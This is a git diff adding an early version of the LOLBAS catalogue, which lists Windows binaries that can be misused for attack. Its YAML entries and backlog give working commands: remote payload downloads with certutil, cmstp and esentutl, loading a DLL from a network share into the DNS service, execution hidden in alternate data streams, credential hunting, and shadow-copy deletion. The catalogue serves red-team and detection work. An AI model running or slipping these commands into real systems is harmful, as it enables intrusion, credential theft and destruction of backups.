diff --git a/Backlog.txt b/Backlog.txt new file mode 100644 index 0000000..73fc4eb --- /dev/null +++ b/Backlog.txt @@ -0,0 +1,18 @@ +Ntsd.exe Debugger +Kd.exe Debugger +Certreq.exe Exfiltrate data +Dbghost.exe +Robocopy.exe Needs examples +Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet +notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins? +wbadmin.exe wbadmin delete catalog -quiet +psexec.exe Remote execution of code +java.exe -agentpath: or -agentlib: +WinMail.exe DLL Sideloading +odbcad32.exe GUI DLL Loading +WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f +dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/ +http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/ +https://twitter.com/Hexacorn/status/993498264497541120 +https://twitter.com/Hexacorn/status/994000792628719618 +https://github.com/MoooKitty/Code-Execution diff --git a/Contribute.md b/Contribute.md new file mode 100644 index 0000000..14ca7a0 --- /dev/null +++ b/Contribute.md @@ -0,0 +1,36 @@ +Use this a Template for new binaries and scripts. +If you think it is hard to make a pull request using github, don't hasitate +to send me a tweet and I will add the contribution for you. + +## Binary.exe + +* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search, Compile, Credentials, Surveillance + +``` +Example +``` + +Acknowledgements: +* Name of guy - @twitterhandle + +Code sample: +* [NameOfLink](Payload/NameOfPayload) + +Resources: +* https://linktosomethingusefull.com + +Full path: +``` +c:\windows\system32\binary.exe +c:\windows\sysWOW64\binary.exe +``` + +Notes: +Some specific details about the binary file. + + +Detection: +Details about detection. +IOC, Behaviour , User Agents etc + + diff --git a/LOLBins.md b/LOLBins.md new file mode 100644 index 0000000..48fe6af --- /dev/null +++ b/LOLBins.md 
@@ -0,0 +1,102 @@ +# LOLBins - Living Off The Land Binaries +Please contribute and do point out errors or resources I have forgotten. +If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose). + + +# OS BINARIES +[Atbroker.exe](OSBinaries/Atbroker.md) +[Bash.exe](OSBinaries/Bash.md) +[Bitsadmin.exe](OSBinaries/Bitsadmin.md) +[Certutil.exe](OSBinaries/Certutil.md) +[Cmdkey.exe](OSBinaries/Cmdkey.md) +[Cmstp.exe](OSBinaries/Cmstp.md) +[Control.exe](OSBinaries/Control.md) +[Csc.exe](OSBinaries/Csc.md) +[Cscript.exe](OSBinaries/Cscript.md) +[Dfsvc.exe](OSBinaries/Dfsvc.md) +[Diskshadow.exe](OSBinaries/Diskshadow.md) +[Dnscmd.exe](OSBinaries/Dnscmd.md) +[Esentutl.exe](OSBinaries/Esentutl.md) +[Extexport.exe](OSBinaries/Extexport.md) +[Extrac32.exe](OSBinaries/Extrac32.md) +[Expand.exe](OSBinaries/Expand.md) +[Explorer.exe](OSBinaries/Explorer.md) +[Findstr.exe](OSBinaries/Findstr.md) +[Forfiles.exe](OSBinaries/Forfiles.md) +[Gpscript.exe](OSBinaries/Gpscript.md) +[Hh.exe](OSBinaries/Hh.md) +[Ieexec.exe](OSBinaries/Ieexec.md) +[Ie4unit.exe](OSBinaries/Ie4unit.md) +[Infdefaultinstall.exe](OSBinaries/Infdefaultinstall.md) +[Installutil.exe](OSBinaries/Installutil.md) +[Makecab.exe](OSBinaries/Makecab.md) +[Mavinject.exe](OSBinaries/Mavinject.md) +[Msbuild.exe](OSBinaries/Msbuild.md) +[Msconfig.exe](OSBinaries/Msconfig.md) +[Msdt.exe](OSBinaries/Msdt.md) +[Mshta.exe](OSBinaries/Mshta.md) +[Msiexec.exe](OSBinaries/Msiexec.md) +[Netsh.exe](OSBinaries/Netsh.md) +[Nltest.exe](OSBinaries/Nltest.md) +[Odbcconf.exe](OSBinaries/Odbcconf.md) +[Openwith.exe](OSBinaries/Openwith.md) +[Pcalua.exe](OSBinaries/Pcalua.md) +[Pcwrun.exe](OSBinaries/Pcwrun.md) +[Powershell.exe](OSBinaries/Powershell.md) +[Presentationhost.exe](OSBinaries/Presentationhost.md) +[Print.exe](OSBinaries/Print.md) +[Psr.exe](OSBinaries/Psr.md) +[Reg.exe](OSBinaries/Reg.md) +[Regedit.exe](OSBinaries/Regedit.md) +[Regasm.exe](OSBinaries/Regasm.md) 
+[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md) +[Regsvcs.exe](OSBinaries/Regsvcs.md) +[Regsvr32.exe](OSBinaries/Regsvr32.md) +[Replace.exe](OSBinaries/Replace.md) +[Robocopy.exe](OSBinaries/Robocopy.md) +[Rpcping.exe](OSBinaries/Rpcping.md) +[Rundll32.exe](OSBinaries/Rundll32.md) +[Runonce.exe](OSBinaries/Runonce.md) +[Runscripthelper.exe](OSBinaries/Runscripthelper.md) +[Sc.exe](OSBinaries/Sc.md) +[Scriptrunner.exe](OSBinaries/Scriptrunner.md) +[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md) +[Wab.exe](OSBinaries/Wab.md) +[Wmic.exe](OSBinaries/Wmic.md) +[Wscript.exe](OSBinaries/Wscript.md) +[Xwizard.exe](OSBinaries/Xwizard.md) + + + +# OTHER MICROSOFT SIGNED BINARIES +[Appvlp.exe](OtherMSBinaries/Appvlp.md) +[Bginfo.exe](OtherMSBinaries/Bginfo.md) +[Cdb.exe](OtherMSBinaries/Cdb.md) +[Csi.exe](OtherMSBinaries/Csi.md) +[Dnx.exe](OtherMSBinaries/Dnx.md) +[Dxcap.exe](OtherMSBinaries/Dxcap.md) +[Mftrace.exe](OtherMSBinaries/Mftrace.md) +[Msdeploy.exe](OtherMSBinaries/Msdeploy.md) +[Msxsl.exe](OtherMSBinaries/Msxsl.md) +[Rcsi.exe](OtherMSBinaries/Rcsi.md) +[Sqldumper.exe](OtherMSBinaries/Sqldumper.md) +[Sqlps.exe](OtherMSBinaries/Sqlps.md) +[Sqltoolsps.exe](OtherMSBinaries/Sqltoolsps.md) +[Te.exe](OtherMSBinaries/Te.md) +[Tracker.exe](OtherMSBinaries/Tracker.md) +[Vsjitdebugger.exe](OtherMSBinaries/Vsjitdebugger.md) +[Winword.exe](OtherMSBinaries/Winword.md) + + + +# OTHER NON MICROSOFT BINARIES +[AcroRd32.exe](OtherBinaries/AcroRd32.md) +[Gpup.exe](OtherBinaries/Gpup.md) +[Nlnotes.exe](OtherBinaries/Nlnotes.md) +[Notes.exe](OtherBinaries/Notes.md) +[Nvuhda6.exe](OtherBinaries/Nvuhda6.md) +[Nvudisp.exe](OtherBinaries/Nvudisp.md) +[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md) +[Usbinst.exe](OtherBinaries/Usbinst.md) +[ROCCAT_Swarm.exe](OtherBinaries/ROCCAT_Swarm.md) +[Setup.exe](OtherBinaries/Setup.md) - Launches HP Installer for HP LaserJet Enterprise 700 color MFP M775 Printer Series Full Software and Drivers 
diff --git a/LOLLibs.md b/LOLLibs.md new file mode 100644 index 0000000..b4fce91 --- /dev/null +++ b/LOLLibs.md @@ -0,0 +1,25 @@ +# LOLLibs - Living Off The Land Libraries +Please contribute and do point out errors or resources I have forgotten. +If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose). + + +# OS LIBRARIES +[Advpack.dll](OSLibraries/Advpack.md) +[Ieadvpack.dll](OSLibraries/Ieadvpack.md) +[Ieframe.dll](OSLibraries/Ieframe.md) +[Mshtml.dll](OSLibraries/Mshtml.md) +[Pcwutl.dll](OSLibraries/Pcwutl.md) +[Shdocvw.dll](OSLibraries/Shdocvw.md) +[Zipfldr.dll](OSLibraries/Zipfldr.md) +[Shell32.dll](OSLibraries/Shell32.md) +[Setupapi.dll](OSLibraries/Setupapi.md) +[Url.dll](OSLibraries/Url.md) +[Zipfldr.dll](OSLibraries/Zipfldr.md) + +# OTHER MICROSOFT SIGNED LIBRARIES + + +# OTHER NON MICROSOFT LIBRARIES + + + diff --git a/LOLScripts.md b/LOLScripts.md new file mode 100644 index 0000000..49d1da4 --- /dev/null +++ b/LOLScripts.md @@ -0,0 +1,23 @@ +# LOLScripts - Living Off The Land Scripts +Please contribute and do point out errors or resources I have forgotten. +If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose). + + +# OS SCRIPTS +[Cl_invocation.ps1](OSScrits/Cl_invocation.md) +[CL_mutexverifiers.ps1](OSScripts/CL_mutexverifiers.md) +[Manage-bde.vbs](OSScripts/Manage-bde.md) +[pester.bat](OSScripts/pester.md) +[Pubprn.vbs](OSScripts/Pubprn.md) +[Slmgr.vbs](OSScripts/Slmgr.md) +[Syncappvpublishingserver.vbs](OSScripts/Syncappvpublishingserver.md) +[Winrm.vbs](OSScripts/Winrm.md) + + + +# OTHER MICROSOFT SIGNED SCRIPTS + + + +# OTHER NON MICROSOFT BINARIES +[Testxlst.js](OtherScripts/Testxlst.md) \ No newline at end of file diff --git a/Logo/LOL1.png b/Logo/LOL1.png new file mode 100644 index 0000000..48322de Binary files /dev/null and b/Logo/LOL1.png differ 
diff --git a/Logo/LOL2.png b/Logo/LOL2.png new file mode 100644 index 0000000..d7255ca Binary files /dev/null and b/Logo/LOL2.png differ diff --git a/Logo/LOL3.png b/Logo/LOL3.png new file mode 100644 index 0000000..5da3762 Binary files /dev/null and b/Logo/LOL3.png differ diff --git a/Logo/LOLBAS.png b/Logo/LOLBAS.png new file mode 100644 index 0000000..a2e8321 Binary files /dev/null and b/Logo/LOLBAS.png differ diff --git a/Logo/LOLBAS2.png b/Logo/LOLBAS2.png new file mode 100644 index 0000000..b574965 Binary files /dev/null and b/Logo/LOLBAS2.png differ diff --git a/Logo/LOLBAS3.png b/Logo/LOLBAS3.png new file mode 100644 index 0000000..7afc24a Binary files /dev/null and b/Logo/LOLBAS3.png differ diff --git a/Logo/LOLBin.png b/Logo/LOLBin.png new file mode 100644 index 0000000..9e857a6 Binary files /dev/null and b/Logo/LOLBin.png differ diff --git a/Logo/LOLLib.png b/Logo/LOLLib.png new file mode 100644 index 0000000..a3c965f Binary files /dev/null and b/Logo/LOLLib.png differ diff --git a/Logo/LOLScript.png b/Logo/LOLScript.png new file mode 100644 index 0000000..bae1429 Binary files /dev/null and b/Logo/LOLScript.png differ diff --git a/OSBinaries/Atbroker.yml b/OSBinaries/Atbroker.yml new file mode 100644 index 0000000..af73012 --- /dev/null +++ b/OSBinaries/Atbroker.yml @@ -0,0 +1,20 @@ +--- +Name: Atbroker.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: ATBroker.exe /start malware + Description: Start a registered Assistive Technology (AT). +Full Path: + - C:\Windows\System32\Atbroker.exe + - C:\Windows\SysWOW64\Atbroker.exe +Code Sample: [] +Detection: [] +Resources: + - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ +Notes: > + Thanks to Adam - @hexacorn + Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. + 
diff --git a/OSBinaries/Bash.yml b/OSBinaries/Bash.yml new file mode 100644 index 0000000..9f61b57 --- /dev/null +++ b/OSBinaries/Bash.yml @@ -0,0 +1,17 @@ +--- +Name: Bash.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: bash.exe -c calc.exe + Description: Execute calc.exe. +Full Path: + - '?' +Code Sample: [] +Detection: [] +Resources: + - '' +Notes: Thanks to ? + diff --git a/OSBinaries/Bitsadmin.yml b/OSBinaries/Bitsadmin.yml new file mode 100644 index 0000000..61ef57d --- /dev/null +++ b/OSBinaries/Bitsadmin.yml 
@@ -0,0 +1,36 @@ +--- +Name: Bitsadmin.exe +Description: Execute, Download, Copy, Read ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: | + bitsadmin /create 1 + bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe + bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL + bitsadmin /RESUME 1 + bitsadmin /complete 1 + - Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. + - Command: | + bitsadmin /create 1 + bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe + bitsadmin /RESUME 1 + bitsadmin /complete 1 + Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. + - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset + Description: One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. + - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset + Description: One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. 
+Full Path: + - c:\Windows\System32\bitsadmin.exe + - c:\Windows\SysWOW64\bitsadmin.exe +Code Sample: [] +Detection: [] +Resources: + - https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 + - Slide 53 + - https://www.youtube.com/watch?v=_8xJaaQlpBo + - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe + diff --git a/OSBinaries/Certutil.yml b/OSBinaries/Certutil.yml new file mode 100644 index 0000000..9f88e41 --- /dev/null +++ b/OSBinaries/Certutil.yml @@ -0,0 +1,25 @@ +--- +Name: Certutil.exe +Description: Download, Add ADS, Decode, Encode +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe + Description: Download and save 7zip to disk in the current folder. + - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt + Description: Download and save a PS1 file to an Alternate Data Stream (ADS). + - Command: | + certutil -encode inputFileName encodedOutputFileName + certutil -decode encodedInputFileName decodedOutputFileName + Description: Commands to encode and decode a file using Base64. +Full Path: + - c:\windows\system32\certutil.exe + - c:\windows\sysWOW64\certutil.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/Moriarty_Meng/status/984380793383370752 + - https://twitter.com/mattifestation/status/620107926288515072 +Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016 + diff --git a/OSBinaries/Cmdkey.yml b/OSBinaries/Cmdkey.yml new file mode 100644 index 0000000..a87826d --- /dev/null +++ b/OSBinaries/Cmdkey.yml 
@@ -0,0 +1,18 @@ +--- +Name: Cmdkey.exe +Description: Credentials +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: cmdkey /list + Description: List cached credentials. +Full Path: + - c:\windows\system32\cmdkey.exe + - c:\windows\sysWOW64\cmdkey.exe +Code Sample: [] +Detection: [] +Resources: + - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation +Notes: '' + diff --git a/OSBinaries/Cmstp.yml b/OSBinaries/Cmstp.yml new file mode 100644 index 0000000..014e7b2 --- /dev/null +++ b/OSBinaries/Cmstp.yml @@ -0,0 +1,26 @@ +--- +Name: Cmstp.exe +Description: Execute, UACBypass +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf + Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. + - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf + Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. +Full Path: + - C:\Windows\system32\cmstp.exe + - C:\Windows\sysWOW64\cmstp.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/NickTyrer/status/958450014111633408 + - https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 + - https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e + - https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ + - https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 + (UAC Bypass) + - https://github.com/hfiref0x/UACME +Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer + 
diff --git a/OSBinaries/Control.yml b/OSBinaries/Control.yml new file mode 100644 index 0000000..9c97e39 --- /dev/null +++ b/OSBinaries/Control.yml @@ -0,0 +1,21 @@ +--- +Name: Control.exe +Description: Execute, Read ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: control.exe c:\windows\tasks\file.txt:evil.dll + Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). +Full Path: + - 'C:\Windows\system32\control.exe ' + - 'C:\Windows\sysWOW64\control.exe ' +Code Sample: [] +Detection: [] +Resources: + - https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ + - https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ + - https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ + - https://twitter.com/bohops/status/955659561008017409 +Notes: Thanks to Jimmy - @bohops + diff --git a/OSBinaries/Csc.yml b/OSBinaries/Csc.yml new file mode 100644 index 0000000..f90575b --- /dev/null +++ b/OSBinaries/Csc.yml @@ -0,0 +1,21 @@ +--- +Name: Csc.exe +Description: Compile +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: csc -out:My.exe File.cs + Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. + - Command: csc -target:library File.cs + Description: '' +Full Path: + - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe + - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe +Code Sample: [] +Detection: [] +Resources: + - https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe + - '' +Notes: Thanks to ? + diff --git a/OSBinaries/Cscript.yml b/OSBinaries/Cscript.yml new file mode 100644 index 0000000..757ee19 --- /dev/null +++ b/OSBinaries/Cscript.yml 
@@ -0,0 +1,19 @@ +--- +Name: Cscript.exe +Description: Execute, Read ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: cscript c:\ads\file.txt:script.vbs + Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). +Full Path: + - c:\windows\system32\cscript.exe + - c:\windows\sysWOW64\cscript.exe +Code Sample: [] +Detection: [] +Resources: + - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f + - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Notes: Thanks to Oddvar Moe - @oddvarmoe + diff --git a/OSBinaries/Dfsvc.yml b/OSBinaries/Dfsvc.yml new file mode 100644 index 0000000..463b03d --- /dev/null +++ b/OSBinaries/Dfsvc.yml @@ -0,0 +1,19 @@ +--- +Name: Dfsvc.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Missing Example + Description: '' +Full Path: + - 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe ' + - 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe ' + - 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe ' + - 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe ' +Code Sample: [] +Detection: [] +Resources: + - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf +Notes: Thanks to Casey Smith - @subtee diff --git a/OSBinaries/Diskshadow.yml b/OSBinaries/Diskshadow.yml new file mode 100644 index 0000000..d57c043 --- /dev/null +++ b/OSBinaries/Diskshadow.yml 
@@ -0,0 +1,20 @@ +--- +Name: Diskshadow.exe +Description: Execute, Dump NTDS.dit +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: diskshadow.exe /s c:\test\diskshadow.txt + Description: Execute commands using diskshadow.exe from a prepared diskshadow script. + - Command: diskshadow> exec calc.exe + Description: Execute a calc.exe using diskshadow.exe. +Full Path: + - c:\windows\system32\diskshadow.exe + - c:\windows\sysWOW64\diskshadow.exe +Code Sample: [] +Detection: [] +Resources: + - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ +Notes: Thanks to Jimmy - @bohops + diff --git a/OSBinaries/Dns.yml b/OSBinaries/Dns.yml new file mode 100644 index 0000000..8afb67b --- /dev/null +++ b/OSBinaries/Dns.yml @@ -0,0 +1,27 @@ +--- +Name: Dnscmd.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll + Description: 'Adds a specially crafted DLL as a plug-in of the DNS Service.' +Full Path: + - c:\windows\system32\Dnscmd.exe + - c:\windows\sysWOW64\Dnscmd.exe +Code Sample: [] +Detection: [] +Resources: + - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 + - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html + - https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp + - https://twitter.com/Hexacorn/status/994000792628719618 + - http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html +Notes: | + This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details. + Thanks to Shay Ber - ?, + Dimitrios Slamaris - @dim0x69, + Nikhil SamratAshok, + Mittal - @nikhil_mitt + 
diff --git a/OSBinaries/Esentutl.yml b/OSBinaries/Esentutl.yml new file mode 100644 index 0000000..2347837 --- /dev/null +++ b/OSBinaries/Esentutl.yml @@ -0,0 +1,28 @@ +--- +Name: Esentutl.exe +Description: Copy, Download, Write ADS, Read ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o + Description: Copies the source VBS file to the destination VBS file. + - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o + Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. + - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o + Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. + - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o + Description: Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file. + - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o + Description: Copies the source EXE to the destination EXE file. + - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o + Description: Copies the source EXE to the destination EXE file +Full Path: + - c:\windows\system32\esentutl.exe + - c:\windows\sysWOW64\esentutl.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/egre55/status/985994639202283520 +Notes: Thanks to egre55 - @egre55 + diff --git a/OSBinaries/Expand.yml b/OSBinaries/Expand.yml new file mode 100644 index 0000000..dea7d4b --- /dev/null +++ b/OSBinaries/Expand.yml 
@@ -0,0 +1,23 @@ +--- +Name: Expand.exe +Description: Download, Copy, Add ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat + Description: 'Copies source file to destination.' + - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat + Description: 'Copies source file to destination.' + - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat + Description: 'Copies source file to destination Alternate Data Stream (ADS).' +Full Path: + - c:\windows\system32\Expand.exe + - c:\windows\sysWOW64\Expand.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/infosecn1nja/status/986628482858807297 + - https://twitter.com/Oddvarmoe/status/986709068759949319 +Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe + diff --git a/OSBinaries/Explorer.yml b/OSBinaries/Explorer.yml new file mode 100644 index 0000000..ac7879b --- /dev/null +++ b/OSBinaries/Explorer.yml @@ -0,0 +1,18 @@ +--- +Name: Explorer.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: explorer.exe calc.exe + Description: 'Executes calc.exe as a subprocess of explorer.exe.' +Full Path: + - c:\windows\explorer.exe + - c:\windows\sysWOW64\explorer.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/bohops/status/986984122563391488 +Notes: Thanks to Jimmy - @bohops + diff --git a/OSBinaries/Extexport.yml b/OSBinaries/Extexport.yml new file mode 100644 index 0000000..a858f1e --- /dev/null +++ b/OSBinaries/Extexport.yml 
@@ -0,0 +1,18 @@ +--- +Name: Extexport.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Extexport.exe c:\test foo bar + Description: 'Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll' +Full Path: + - 'C:\Program Files\Internet Explorer\Extexport.exe ' + - C:\Program Files\Internet Explorer(x86)\Extexport.exe +Code Sample: [] +Detection: [] +Resources: + - http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ +Notes: Thanks to Adam - @hexacorn + diff --git a/OSBinaries/Extrac32.yml b/OSBinaries/Extrac32.yml new file mode 100644 index 0000000..3d8febe --- /dev/null +++ b/OSBinaries/Extrac32.yml @@ -0,0 +1,24 @@ +--- +Name: Extrac32.exe +Description: Add ADS, Download +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe + Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.' + - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe + Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.' + - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt + Description: 'Copy the source file to the destination file and overwrite it.' +Full Path: + - c:\windows\system32\extrac32.exe + - c:\windows\sysWOW64\extrac32.exe +Code Sample: [] +Detection: [] +Resources: + - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ + - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f + - https://twitter.com/egre55/status/985994639202283520 +Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55 + diff --git a/OSBinaries/Findstr.yml b/OSBinaries/Findstr.yml new file mode 100644 index 0000000..5945a9d --- /dev/null +++ b/OSBinaries/Findstr.yml 
@@ -0,0 +1,23 @@ +--- +Name: Findstr.exe +Description: Add ADS, Search +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe + Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.' + - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe + Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.' + - Command: findstr /S /I cpassword \\\sysvol\\policies\*.xml + Description: 'Search for stored password in Group Policy files stored on SYSVOL.' +Full Path: + - c:\windows\system32\findstr.exe + - c:\windows\sysWOW64\findstr.exe +Code Sample: [] +Detection: [] +Resources: + - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ + - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Notes: Thanks to Oddvar Moe - @oddvarmoe + diff --git a/OSBinaries/Forfiles.yml b/OSBinaries/Forfiles.yml new file mode 100644 index 0000000..25c9393 --- /dev/null +++ b/OSBinaries/Forfiles.yml 
@@ -0,0 +1,22 @@ +--- +Name: Forfiles.exe +Description: Execute, Read ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + Description: 'Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.' + - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" + Description: 'Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.' +Full Path: + - C:\Windows\system32\forfiles.exe + - C:\Windows\sysWOW64\forfiles.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/vector_sec/status/896049052642533376 + - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f + - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe + diff --git a/OSBinaries/Gpscript.yml b/OSBinaries/Gpscript.yml new file mode 100644 index 0000000..3b457d9 --- /dev/null +++ b/OSBinaries/Gpscript.yml @@ -0,0 +1,22 @@ +--- 